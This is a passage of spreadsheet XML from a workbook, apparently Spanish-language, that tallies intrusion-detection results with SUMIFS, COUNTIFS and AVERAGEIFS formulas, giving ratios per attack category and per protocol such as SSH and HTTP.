      <c r="K15" s="292"/>
      <c r="L15" s="292"/>
      <c r="M15" s="292"/>
      <c r="N15" s="292"/>
      <c r="O15" s="292"/>
      <c r="P15" s="292"/>
      <c r="Q15" s="292"/>
      <c r="R15" s="292"/>
      <c r="S15" s="292"/>
      <c r="T15" s="292"/>
      <c r="U15" s="293"/>
      <c r="W15" s="294" t="s">
        <v>2668</v>
      </c>
      <c r="X15" s="292"/>
      <c r="Y15" s="292"/>
      <c r="Z15" s="292"/>
      <c r="AA15" s="292"/>
      <c r="AB15" s="292"/>
      <c r="AC15" s="292"/>
      <c r="AD15" s="292"/>
      <c r="AE15" s="292"/>
      <c r="AF15" s="292"/>
      <c r="AG15" s="292"/>
      <c r="AH15" s="292"/>
      <c r="AI15" s="292"/>
      <c r="AJ15" s="292"/>
      <c r="AK15" s="292"/>
      <c r="AL15" s="292"/>
      <c r="AM15" s="292"/>
      <c r="AN15" s="292"/>
      <c r="AO15" s="292"/>
      <c r="AP15" s="292"/>
      <c r="AQ15" s="292"/>
      <c r="AR15" s="292"/>
      <c r="AS15" s="292"/>
      <c r="AT15" s="292"/>
      <c r="AU15" s="292"/>
      <c r="AV15" s="292"/>
      <c r="AW15" s="292"/>
      <c r="AX15" s="292"/>
      <c r="AY15" s="292"/>
      <c r="AZ15" s="292"/>
      <c r="BA15" s="292"/>
      <c r="BB15" s="292"/>
      <c r="BC15" s="292"/>
      <c r="BD15" s="292"/>
      <c r="BE15" s="292"/>
      <c r="BF15" s="292"/>
      <c r="BG15" s="292"/>
      <c r="BH15" s="292"/>
      <c r="BI15" s="292"/>
      <c r="BJ15" s="292"/>
      <c r="BK15" s="292"/>
      <c r="BL15" s="292"/>
      <c r="BM15" s="292"/>
      <c r="BN15" s="292"/>
      <c r="BO15" s="292"/>
      <c r="BP15" s="292"/>
      <c r="BQ15" s="292"/>
      <c r="BR15" s="292"/>
      <c r="BS15" s="292"/>
      <c r="BT15" s="292"/>
      <c r="BU15" s="292"/>
      <c r="BV15" s="292"/>
      <c r="BW15" s="292"/>
      <c r="BX15" s="292"/>
      <c r="BY15" s="292"/>
      <c r="BZ15" s="292"/>
      <c r="CA15" s="292"/>
      <c r="CB15" s="292"/>
      <c r="CC15" s="292"/>
      <c r="CD15" s="292"/>
      <c r="CE15" s="292"/>
      <c r="CF15" s="292"/>
      <c r="CG15" s="292"/>
      <c r="CH15" s="292"/>
      <c r="CI15" s="292"/>
      <c r="CJ15" s="292"/>
      <c r="CK15" s="292"/>
      <c r="CL15" s="292"/>
      <c r="CM15" s="292"/>
      <c r="CN15" s="292"/>
      <c r="CO15" s="292"/>
      <c r="CP15" s="292"/>
      <c r="CQ15" s="292"/>
      <c r="CR15" s="292"/>
      <c r="CS15" s="292"/>
      <c r="CT15" s="292"/>
      <c r="CU15" s="292"/>
      <c r="CV15" s="292"/>
      <c r="CW15" s="292"/>
      <c r="CX15" s="292"/>
      <c r="CY15" s="293"/>
      <c r="CZ15" s="574"/>
      <c r="DA15" s="574"/>
      <c r="DB15" s="574"/>
      <c r="DC15" s="574"/>
      <c r="DD15" s="638" t="s">
        <v>427</v>
      </c>
      <c r="DE15" s="726">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HW$3:$HW$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DD15,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>5</v>
      </c>
      <c r="DF15" s="736">
        <v>0.0</v>
      </c>
      <c r="DG15" s="337">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DH15" s="719">
        <f t="shared" si="10"/>
        <v>5</v>
      </c>
      <c r="DI15" s="720">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="DJ15" s="719">
        <v>1.0</v>
      </c>
      <c r="DK15" s="20"/>
      <c r="DL15" s="20">
        <v>0.0</v>
      </c>
      <c r="DM15" s="20">
        <v>3.0</v>
      </c>
      <c r="DN15" s="336">
        <f t="shared" si="12"/>
        <v>0.6</v>
      </c>
      <c r="DO15" s="336">
        <f t="shared" si="13"/>
        <v>0.4</v>
      </c>
      <c r="DP15" s="721">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="DR15" s="610"/>
      <c r="DS15" s="610"/>
      <c r="DT15" s="619" t="s">
        <v>427</v>
      </c>
      <c r="DU15" s="612">
        <f>DF15/'(D) - Análisis Resultados I - S'!EB34</f>
        <v>0</v>
      </c>
      <c r="DV15" s="574"/>
      <c r="DW15" s="619" t="s">
        <v>427</v>
      </c>
      <c r="DX15" s="612">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="DY15" s="722">
        <v>0.5833333333333334</v>
      </c>
      <c r="DZ15" s="722"/>
      <c r="EA15" s="722"/>
      <c r="EE15" s="636" t="s">
        <v>2013</v>
      </c>
      <c r="EF15" s="69" t="str">
        <f>(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE15,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE15  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE15,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE15  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EG15" s="69" t="str">
        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE15,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE15  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE15,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE15  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EH15" s="336" t="str">
        <f>IF((COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE15,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE15  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))&lt;&gt;0,(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE15,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE15  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE15,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE15  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")),"-")</f>
        <v>-</v>
      </c>
      <c r="EI15" s="629" t="s">
        <v>12</v>
      </c>
      <c r="EJ15" s="20"/>
      <c r="EK15" s="20"/>
      <c r="EL15" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP6&lt;&gt;0,'(B) - Detecciones - Ataques'!IP6*'(B) - Detecciones - Ataques'!IL6/('(B) - Detecciones - Ataques'!IL6+'(B) - Detecciones - Ataques'!IN6),0)</f>
        <v>0</v>
      </c>
      <c r="EM15" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP6&lt;&gt;0,'(B) - Detecciones - Ataques'!IP6*'(B) - Detecciones - Ataques'!IN6/('(B) - Detecciones - Ataques'!IL6+'(B) - Detecciones - Ataques'!IN6),0)</f>
        <v>0</v>
      </c>
      <c r="EN15" s="626"/>
      <c r="EO15" s="626"/>
      <c r="EP15" s="729"/>
      <c r="EQ15" s="730"/>
      <c r="ER15" s="731" t="s">
        <v>633</v>
      </c>
      <c r="ES15" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$ER15)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER15 &amp; "*")</f>
        <v>2</v>
      </c>
      <c r="ET15" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,ER15)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER15 &amp; "*")</f>
        <v>4</v>
      </c>
      <c r="EU15" s="728">
        <f t="shared" ref="EU15:EU25" si="16">ES15/ET15</f>
        <v>0.5</v>
      </c>
      <c r="EV15" s="730"/>
      <c r="EW15" s="732"/>
      <c r="EX15" s="730"/>
      <c r="EY15" s="730"/>
      <c r="EZ15" s="20" t="s">
        <v>2665</v>
      </c>
      <c r="FA15" s="336">
        <f>FA10/(SUM('(B) - Detecciones - Ataques'!N3:O139))</f>
        <v>0.08684436337</v>
      </c>
      <c r="FD15" s="173"/>
      <c r="FE15" s="173"/>
      <c r="FF15" s="173"/>
      <c r="FG15" s="173"/>
      <c r="FH15" s="173"/>
      <c r="FI15" s="173"/>
      <c r="FJ15" s="173"/>
      <c r="FK15" s="173"/>
      <c r="FL15" s="173"/>
      <c r="FM15" s="173"/>
      <c r="FN15" s="173"/>
      <c r="FO15" s="173"/>
      <c r="FP15" s="173"/>
      <c r="FQ15" s="173" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SSH")</f>
        <v>SSH</v>
      </c>
      <c r="FR15" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ15)</f>
        <v>1</v>
      </c>
      <c r="FS15" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ15)</f>
        <v>0.9285714286</v>
      </c>
      <c r="FT15" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ15)</f>
        <v>1</v>
      </c>
      <c r="FU15" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ15)</f>
        <v>7</v>
      </c>
    </row>
    <row r="16">
      <c r="D16" s="737">
        <f>SUM('(B) - Detecciones - Ataques'!IM3:IM139)</f>
        <v>81531</v>
      </c>
      <c r="E16" s="625">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!IM3:IM139)</f>
        <v>81075</v>
      </c>
      <c r="G16" s="315" t="s">
        <v>2447</v>
      </c>
      <c r="H16" s="316" t="s">
        <v>2093</v>
      </c>
      <c r="I16" s="316" t="s">
        <v>2013</v>
      </c>
      <c r="J16" s="316" t="s">
        <v>951</v>
      </c>
      <c r="K16" s="316" t="s">
        <v>633</v>
      </c>
      <c r="L16" s="316" t="s">
        <v>1725</v>
      </c>
      <c r="M16" s="316" t="s">
        <v>244</v>
      </c>
      <c r="N16" s="316" t="s">
        <v>427</v>
      </c>
      <c r="O16" s="316" t="s">
        <v>1373</v>
      </c>
      <c r="P16" s="316" t="s">
        <v>209</v>
      </c>
      <c r="Q16" s="316" t="s">
        <v>664</v>
      </c>
      <c r="R16" s="316" t="s">
        <v>357</v>
      </c>
      <c r="S16" s="316" t="s">
        <v>310</v>
      </c>
      <c r="T16" s="316" t="s">
        <v>292</v>
      </c>
      <c r="U16" s="317" t="s">
        <v>558</v>
      </c>
      <c r="W16" s="315" t="s">
        <v>2447</v>
      </c>
      <c r="X16" s="318" t="s">
        <v>2108</v>
      </c>
      <c r="Y16" s="319" t="s">
        <v>2177</v>
      </c>
      <c r="Z16" s="318" t="s">
        <v>2193</v>
      </c>
      <c r="AA16" s="318" t="s">
        <v>2095</v>
      </c>
      <c r="AB16" s="318" t="s">
        <v>2074</v>
      </c>
      <c r="AC16" s="318" t="s">
        <v>2061</v>
      </c>
      <c r="AD16" s="318" t="s">
        <v>2015</v>
      </c>
      <c r="AE16" s="318" t="s">
        <v>953</v>
      </c>
      <c r="AF16" s="318" t="s">
        <v>1040</v>
      </c>
      <c r="AG16" s="318" t="s">
        <v>1012</v>
      </c>
      <c r="AH16" s="318" t="s">
        <v>1164</v>
      </c>
      <c r="AI16" s="318" t="s">
        <v>1848</v>
      </c>
      <c r="AJ16" s="318" t="s">
        <v>2300</v>
      </c>
      <c r="AK16" s="318" t="s">
        <v>1138</v>
      </c>
      <c r="AL16" s="318" t="s">
        <v>974</v>
      </c>
      <c r="AM16" s="318" t="s">
        <v>1108</v>
      </c>
      <c r="AN16" s="318" t="s">
        <v>1702</v>
      </c>
      <c r="AO16" s="318" t="s">
        <v>1626</v>
      </c>
      <c r="AP16" s="320" t="s">
        <v>636</v>
      </c>
      <c r="AQ16" s="318" t="s">
        <v>1726</v>
      </c>
      <c r="AR16" s="318" t="s">
        <v>822</v>
      </c>
      <c r="AS16" s="318" t="s">
        <v>445</v>
      </c>
      <c r="AT16" s="318" t="s">
        <v>1747</v>
      </c>
      <c r="AU16" s="318" t="s">
        <v>989</v>
      </c>
      <c r="AV16" s="318" t="s">
        <v>246</v>
      </c>
      <c r="AW16" s="318" t="s">
        <v>2242</v>
      </c>
      <c r="AX16" s="318" t="s">
        <v>1282</v>
      </c>
      <c r="AY16" s="318" t="s">
        <v>429</v>
      </c>
      <c r="AZ16" s="318" t="s">
        <v>912</v>
      </c>
      <c r="BA16" s="318" t="s">
        <v>1837</v>
      </c>
      <c r="BB16" s="318" t="s">
        <v>1510</v>
      </c>
      <c r="BC16" s="318" t="s">
        <v>1411</v>
      </c>
      <c r="BD16" s="318" t="s">
        <v>1397</v>
      </c>
      <c r="BE16" s="318" t="s">
        <v>1374</v>
      </c>
      <c r="BF16" s="318" t="s">
        <v>677</v>
      </c>
      <c r="BG16" s="318" t="s">
        <v>790</v>
      </c>
      <c r="BH16" s="318" t="s">
        <v>262</v>
      </c>
      <c r="BI16" s="318" t="s">
        <v>771</v>
      </c>
      <c r="BJ16" s="318" t="s">
        <v>724</v>
      </c>
      <c r="BK16" s="318" t="s">
        <v>211</v>
      </c>
      <c r="BL16" s="318" t="s">
        <v>805</v>
      </c>
      <c r="BM16" s="318" t="s">
        <v>932</v>
      </c>
      <c r="BN16" s="318" t="s">
        <v>1306</v>
      </c>
      <c r="BO16" s="318" t="s">
        <v>1903</v>
      </c>
      <c r="BP16" s="318" t="s">
        <v>2335</v>
      </c>
      <c r="BQ16" s="318" t="s">
        <v>1983</v>
      </c>
      <c r="BR16" s="318" t="s">
        <v>1999</v>
      </c>
      <c r="BS16" s="318" t="s">
        <v>1971</v>
      </c>
      <c r="BT16" s="318" t="s">
        <v>1201</v>
      </c>
      <c r="BU16" s="318" t="s">
        <v>750</v>
      </c>
      <c r="BV16" s="318" t="s">
        <v>666</v>
      </c>
      <c r="BW16" s="318" t="s">
        <v>892</v>
      </c>
      <c r="BX16" s="318" t="s">
        <v>1214</v>
      </c>
      <c r="BY16" s="318" t="s">
        <v>1293</v>
      </c>
      <c r="BZ16" s="318" t="s">
        <v>1331</v>
      </c>
      <c r="CA16" s="318" t="s">
        <v>2215</v>
      </c>
      <c r="CB16" s="318" t="s">
        <v>2261</v>
      </c>
      <c r="CC16" s="318" t="s">
        <v>359</v>
      </c>
      <c r="CD16" s="318" t="s">
        <v>1230</v>
      </c>
      <c r="CE16" s="318" t="s">
        <v>1812</v>
      </c>
      <c r="CF16" s="318" t="s">
        <v>1958</v>
      </c>
      <c r="CG16" s="318" t="s">
        <v>1667</v>
      </c>
      <c r="CH16" s="318" t="s">
        <v>505</v>
      </c>
      <c r="CI16" s="318" t="s">
        <v>312</v>
      </c>
      <c r="CJ16" s="318" t="s">
        <v>2289</v>
      </c>
      <c r="CK16" s="318" t="s">
        <v>411</v>
      </c>
      <c r="CL16" s="318" t="s">
        <v>1361</v>
      </c>
      <c r="CM16" s="318" t="s">
        <v>701</v>
      </c>
      <c r="CN16" s="318" t="s">
        <v>586</v>
      </c>
      <c r="CO16" s="318" t="s">
        <v>294</v>
      </c>
      <c r="CP16" s="318" t="s">
        <v>339</v>
      </c>
      <c r="CQ16" s="318" t="s">
        <v>370</v>
      </c>
      <c r="CR16" s="318" t="s">
        <v>394</v>
      </c>
      <c r="CS16" s="318" t="s">
        <v>1687</v>
      </c>
      <c r="CT16" s="318" t="s">
        <v>486</v>
      </c>
      <c r="CU16" s="318" t="s">
        <v>1889</v>
      </c>
      <c r="CV16" s="318" t="s">
        <v>1187</v>
      </c>
      <c r="CW16" s="318" t="s">
        <v>560</v>
      </c>
      <c r="CX16" s="318" t="s">
        <v>1175</v>
      </c>
      <c r="CY16" s="321" t="s">
        <v>1926</v>
      </c>
      <c r="CZ16" s="403"/>
      <c r="DA16" s="403"/>
      <c r="DB16" s="403"/>
      <c r="DC16" s="403"/>
      <c r="DD16" s="638" t="s">
        <v>1373</v>
      </c>
      <c r="DE16" s="726">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HW$3:$HW$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DD16,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>18</v>
      </c>
      <c r="DF16" s="719">
        <v>12.0</v>
      </c>
      <c r="DG16" s="337">
        <f t="shared" si="9"/>
        <v>0.6666666667</v>
      </c>
      <c r="DH16" s="719">
        <f t="shared" si="10"/>
        <v>6</v>
      </c>
      <c r="DI16" s="720">
        <f t="shared" si="11"/>
        <v>0.3333333333</v>
      </c>
      <c r="DJ16" s="719">
        <v>2.0</v>
      </c>
      <c r="DK16" s="20"/>
      <c r="DL16" s="20">
        <v>0.0</v>
      </c>
      <c r="DM16" s="20">
        <v>13.0</v>
      </c>
      <c r="DN16" s="336">
        <f t="shared" si="12"/>
        <v>0.7222222222</v>
      </c>
      <c r="DO16" s="336">
        <f t="shared" si="13"/>
        <v>0.2777777778</v>
      </c>
      <c r="DP16" s="721">
        <f t="shared" si="14"/>
        <v>14</v>
      </c>
      <c r="DR16" s="610"/>
      <c r="DS16" s="610"/>
      <c r="DT16" s="619" t="s">
        <v>1373</v>
      </c>
      <c r="DU16" s="612">
        <f>DF16/'(D) - Análisis Resultados I - S'!EB35</f>
        <v>0.6666666667</v>
      </c>
      <c r="DV16" s="403"/>
      <c r="DW16" s="619" t="s">
        <v>1373</v>
      </c>
      <c r="DX16" s="612">
        <f t="shared" si="15"/>
        <v>0.6666666667</v>
      </c>
      <c r="DY16" s="722">
        <v>0.0</v>
      </c>
      <c r="DZ16" s="722"/>
      <c r="EA16" s="722"/>
      <c r="EE16" s="636" t="s">
        <v>951</v>
      </c>
      <c r="EF16" s="69" t="str">
        <f>(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE16,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE16  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE16,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE16  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EG16" s="69" t="str">
        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE16,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE16  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE16,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE16  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EH16" s="336" t="str">
        <f>IF((COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE16,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE16  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))&lt;&gt;0,(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE16,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE16  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE16,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE16  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")),"-")</f>
        <v>#VALUE!</v>
      </c>
      <c r="EI16" s="337" t="str">
        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE16,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE16  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE16,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE16  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EJ16" s="336"/>
      <c r="EK16" s="336"/>
      <c r="EL16" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP7&lt;&gt;0,'(B) - Detecciones - Ataques'!IP7*'(B) - Detecciones - Ataques'!IL7/('(B) - Detecciones - Ataques'!IL7+'(B) - Detecciones - Ataques'!IN7),0)</f>
        <v>0</v>
      </c>
      <c r="EM16" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP7&lt;&gt;0,'(B) - Detecciones - Ataques'!IP7*'(B) - Detecciones - Ataques'!IN7/('(B) - Detecciones - Ataques'!IL7+'(B) - Detecciones - Ataques'!IN7),0)</f>
        <v>0</v>
      </c>
      <c r="EN16" s="626"/>
      <c r="EO16" s="626"/>
      <c r="EP16" s="729"/>
      <c r="EQ16" s="730"/>
      <c r="ER16" s="731" t="s">
        <v>1725</v>
      </c>
      <c r="ES16" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$ER16)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER16 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="ET16" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,ER16)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER16 &amp; "*")</f>
        <v>1</v>
      </c>
      <c r="EU16" s="728">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="EV16" s="730"/>
      <c r="EW16" s="732"/>
      <c r="EX16" s="730"/>
      <c r="EY16" s="730"/>
      <c r="EZ16" s="20" t="s">
        <v>2669</v>
      </c>
      <c r="FA16" s="640">
        <f>1-FA12</f>
        <v>0.2954545455</v>
      </c>
      <c r="FB16" s="20"/>
      <c r="FC16" s="641"/>
      <c r="FD16" s="574"/>
      <c r="FE16" s="574"/>
      <c r="FF16" s="574"/>
      <c r="FG16" s="574"/>
      <c r="FH16" s="574"/>
      <c r="FI16" s="574"/>
      <c r="FJ16" s="574"/>
      <c r="FK16" s="574"/>
      <c r="FL16" s="574"/>
      <c r="FM16" s="574"/>
      <c r="FN16" s="574"/>
      <c r="FO16" s="574"/>
      <c r="FP16" s="574"/>
      <c r="FQ16" s="642" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"HTTP")</f>
        <v>HTTP</v>
      </c>
      <c r="FR16" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ16)</f>
        <v>0.5657902966</v>
      </c>
      <c r="FS16" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ16)</f>
        <v>0.6527468183</v>
      </c>
      <c r="FT16" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ16)</f>
        <v>0.7826086957</v>
      </c>
      <c r="FU16" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ16)</f>
        <v>23</v>
      </c>
    </row>
    <row r="17">
      <c r="D17" s="173"/>
      <c r="E17" s="173"/>
      <c r="G17" s="644" t="s">
        <v>2671</v>
      </c>
      <c r="H17" s="645">
        <f t="shared" ref="H17:K17" si="17">H11/H10</f>
        <v>0.0621005539</v>
      </c>
      <c r="I17" s="645">
        <f t="shared" si="17"/>
        <v>0.9997122716</v>
